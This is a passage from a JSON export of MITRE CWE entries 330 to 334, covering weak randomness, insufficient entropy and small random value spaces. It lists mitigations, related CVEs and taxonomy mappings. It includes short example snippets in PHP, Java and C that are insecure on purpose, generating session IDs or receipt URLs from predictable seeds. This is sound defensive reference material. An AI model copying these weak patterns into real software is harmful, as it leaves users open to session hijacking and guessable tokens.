accuracy and coverage are not feasible."},{"attr":{"@_Mitigation_ID":"MIT-2"},"Phase":["Architecture and Design","Requirements"],"Strategy":"Libraries or Frameworks","Description":"Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems. Consult FIPS 140-2 Annex C (\\"Approved Random Number Generators\\")."},{"Phase":"Testing","Description":"Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-45"},"Intro_Text":"This code attempts to generate a unique random identifier for a user\'s session.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function generateSessionID($userID){}","xhtml:div":{"#text":"srand($userID);return rand();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":["Because the seed for the PRNG is always the user\'s ID, the session ID will always be the same. An attacker could thus predict any user\'s session ID and potentially hijack the session.","This example also exhibits a Small Seed Space (CWE-339)."]},{"attr":{"@_Demonstrative_Example_ID":"DX-46"},"Intro_Text":"The following code uses a statistical PRNG to create a URL for a receipt that remains active for some period of time after a purchase.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String GenerateReceiptURL(String baseUrl) {}","xhtml:div":{"#text":"Random ranGen = new Random();ranGen.setSeed((new Date()).getTime());return(baseUrl + ranGen.nextInt(400000000) + \\".html\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"This code uses the Random.nextInt() function to generate \\"unique\\" identifiers for the receipt pages it generates. Because Random.nextInt() is a statistical PRNG, it is easy for an attacker to guess the strings it generates. Although the underlying design of the receipt system is also faulty, it would be more secure if it used a random number generator that did not produce predictable receipt identifiers, such as a cryptographic PRNG."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-3278","Description":"Crypto product uses rand() library function to generate a recovery key, making it easier to conduct brute force attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3278"},{"Reference":"CVE-2009-3238","Description":"Random number generator can repeatedly generate the same value.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3238"},{"Reference":"CVE-2009-2367","Description":"Web application generates predictable session IDs, allowing session hijacking.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2367"},{"Reference":"CVE-2009-2158","Description":"Password recovery utility generates a relatively small number of random passwords, simplifying brute force attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2158"},{"Reference":"CVE-2009-0255","Description":"Cryptographic key created with a seed based on the system time.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0255"},{"Reference":"CVE-2008-5162","Description":"Kernel function does not have a good entropy source just after boot.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5162"},{"Reference":"CVE-2008-4905","Description":"Blogging software uses a hard-coded salt when calculating a password hash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4905"},{"Reference":"CVE-2008-4929","Description":"Bulletin board application uses insufficiently random names for uploaded files, allowing other users to access private files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4929"},{"Reference":"CVE-2008-3612","Description":"Handheld device uses predictable TCP sequence numbers, allowing spoofing or hijacking of TCP connections.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3612"},{"Reference":"CVE-2008-2433","Description":"Web management console generates session IDs based on the login time, making it easier to conduct session hijacking.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2433"},{"Reference":"CVE-2008-0166","Description":"SSL library uses a weak random number generator that only generates 65,536 unique keys.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0166"},{"Reference":"CVE-2008-2108","Description":"Chain: insufficient precision causes extra zero bits to be assigned, reducing entropy for an API function that generates random numbers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2108"},{"Reference":"CVE-2008-2108","Description":"Chain: insufficient precision (CWE-1339) in\\n\\t     random-number generator causes some zero bits to be reliably\\n\\t     generated, reducing the amount of entropy (CWE-331)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2108"},{"Reference":"CVE-2008-2020","Description":"CAPTCHA implementation does not produce enough different images, allowing bypass using a database of all possible checksums.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2020"},{"Reference":"CVE-2008-0087","Description":"DNS client uses predictable DNS transaction IDs, allowing DNS spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0087"},{"Reference":"CVE-2008-0141","Description":"Application generates passwords that are based on the time of day.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0141"}]},"Functional_Areas":{"Functional_Area":["Cryptography","Authentication","Session Management"]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Randomness and Predictability"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Insecure Randomness"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A2","Entry_Name":"Broken Access Control","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"CON33-C","Entry_Name":"Avoid race conditions when using library functions","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC30-C","Entry_Name":"Do not use the rand() function for generating pseudorandom numbers","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC32-C","Entry_Name":"Properly seed pseudorandom number generators","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":11,"Entry_Name":"Brute Force"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":18,"Entry_Name":"Credential/Session Prediction"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC02-J","Entry_Name":"Generate strong random numbers"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"112"}},{"attr":{"@_CAPEC_ID":"485"}},{"attr":{"@_CAPEC_ID":"59"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-267"}},{"attr":{"@_External_Reference_ID":"REF-207"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 8, &#34;Using Poor Random Numbers&#34; Page 259"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 20: Weak Random Numbers.&#34; Page 299"}}]},"Notes":{"Note":[{"#text":"This can be primary to many other weaknesses such as cryptographic errors, authentication errors, symlink following, information leaks, and others.","attr":{"@_Type":"Relationship"}},{"#text":"As of CWE 4.3, CWE-330 and its descendants are being\\n\\t\\t\\t  investigated by the CWE crypto team to identify gaps\\n\\t\\t\\t  related to randomness and unpredictability, as well as\\n\\t\\t\\t  the relationships between randomness and cryptographic\\n\\t\\t\\t  primitives.  This \\"subtree analysis\\" might\\n\\t\\t\\t  result in the addition or deprecation of existing\\n\\t\\t\\t  entries; the reorganization of relationships in some\\n\\t\\t\\t  views, e.g. the research view (CWE-1000); more consistent\\n\\t\\t\\t  use of terminology; and/or significant modifications to\\n\\t\\t\\t  related entries.","attr":{"@_Type":"Maintenance"}},{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Background_Details, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Likelihood_of_Exploit, Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Observed_Examples, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Detection_Factors, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Functional_Areas, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Maintenance_Notes, Observed_Examples"}],"Previous_Entry_Name":{"#text":"Randomness and Predictability","attr":{"@_Date":"2008-04-11"}}}},"331":{"attr":{"@_ID":"331","@_Name":"Insufficient Entropy","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses an algorithm or scheme that produces insufficient entropy, leaving patterns or clusters of values that are more likely to occur than others.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Other"],"Impact":["Bypass Protection Mechanism","Other"],"Note":"An attacker could guess the random numbers generated and could gain unauthorized access to a system if the random numbers are used for authentication and authorization."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Determine the necessary entropy to adequately provide for randomness and predictability. This can be achieved by increasing the number of bits of objects such as keys and seeds."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-45"},"Intro_Text":"This code generates a unique random identifier for a user\'s session.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function generateSessionID($userID){}","xhtml:div":{"#text":"srand($userID);return rand();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":["Because the seed for the PRNG is always the user\'s ID, the session ID will always be the same. An attacker could thus predict any user\'s session ID and potentially hijack the session.","This example also exhibits a Small Seed Space (CWE-339)."]},{"attr":{"@_Demonstrative_Example_ID":"DX-46"},"Intro_Text":"The following code uses a statistical PRNG to create a URL for a receipt that remains active for some period of time after a purchase.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String GenerateReceiptURL(String baseUrl) {}","xhtml:div":{"#text":"Random ranGen = new Random();ranGen.setSeed((new Date()).getTime());return(baseUrl + ranGen.nextInt(400000000) + \\".html\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"This code uses the Random.nextInt() function to generate \\"unique\\" identifiers for the receipt pages it generates. Because Random.nextInt() is a statistical PRNG, it is easy for an attacker to guess the strings it generates. Although the underlying design of the receipt system is also faulty, it would be more secure if it used a random number generator that did not produce predictable receipt identifiers, such as a cryptographic PRNG."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-0950","Description":"Insufficiently random data used to generate session tokens using C rand(). Also, for certificate/key generation, uses a source that does not block when entropy is low.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0950"},{"Reference":"CVE-2008-2108","Description":"Chain: insufficient precision (CWE-1339) in\\n\\t     random-number generator causes some zero bits to be reliably\\n\\t     generated, reducing the amount of entropy (CWE-331)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2108"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insufficient Entropy"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":11,"Entry_Name":"Brute Force"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC32-C","Entry_Name":"Properly seed pseudorandom number generators","Mapping_Fit":"Exact"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"59"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-207"}}},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes, Observed_Examples"}]}},"332":{"attr":{"@_ID":"332","@_Name":"Insufficient Entropy in PRNG","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The lack of entropy available for, or used by, a Pseudo-Random Number Generator (PRNG) can be a stability and security threat.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"331","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"If a pseudo-random number generator is using a limited entropy source which runs out (if the generator fails closed), the program may pause or crash."},{"Scope":["Access Control","Other"],"Impact":["Bypass Protection Mechanism","Other"],"Note":"If a PRNG is using a limited entropy source which runs out, and the generator fails open, the generator could produce predictable random numbers. Potentially a weak source of random numbers could weaken the encryption method used for authentication of users."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-2"},"Phase":["Architecture and Design","Requirements"],"Strategy":"Libraries or Frameworks","Description":"Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems. Consult FIPS 140-2 Annex C (\\"Approved Random Number Generators\\")."},{"Phase":"Implementation","Description":"Consider a PRNG that re-seeds itself as needed from high-quality pseudo-random output, such as hardware devices."},{"Phase":"Architecture and Design","Description":"When deciding which PRNG to use, look at its sources of entropy. Depending on what your security needs are, you may need to use a random number generator that always uses strong random data -- i.e., a random number generator that attempts to be strong but will fail in a weak way or will always provide some middle ground of protection through techniques like re-seeding. Generally, something that always provides a predictable amount of strength is preferable."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-1715","Description":"security product has insufficient entropy in the DRBG, allowing collisions and private key discovery","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1715"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Insufficient entropy in PRNG"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC02-J","Entry_Name":"Generate strong random numbers"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-267"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes"}]}},"333":{"attr":{"@_ID":"333","@_Name":"Improper Handling of Insufficient Entropy in TRNG","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"True random number generators (TRNG) generally have a limited source of entropy and therefore can fail or block.","Extended_Description":"The rate at which true random numbers can be generated is limited. It is important that one uses them only when they are needed for security.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"331","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"A program may crash or block if it runs out of random numbers."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Rather than failing on a lack of random numbers, it is often preferable to wait for more numbers to be created."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code uses a TRNG to generate a unique session id for new connections to a server:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"while (1){","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (haveNewConnection()){","xhtml:div":{"#text":"if (hwRandom()){} } }","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int sessionID = hwRandom();createNewConnection(sessionID);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}}},"Body_Text":"This code does not attempt to limit the number of new connections or make sure the TRNG can successfully generate a new random number. An attacker may be able to create many new connections and exhaust the entropy of the TRNG. The TRNG may then block and cause the program to crash or hang."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure of TRNG"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC02-J","Entry_Name":"Generate strong random numbers"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes"}],"Previous_Entry_Name":[{"#text":"Failure of TRNG","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Insufficient Entropy in TRNG","attr":{"@_Date":"2009-05-27"}}]}},"334":{"attr":{"@_ID":"334","@_Name":"Small Space of Random Values","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The number of possible random values is smaller than needed by the product, making it more susceptible to brute force attacks.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Other"],"Impact":["Bypass Protection Mechanism","Other"],"Note":"An attacker could easily guess the values used. This could lead to unauthorized access to a system if the seed is used for authentication and 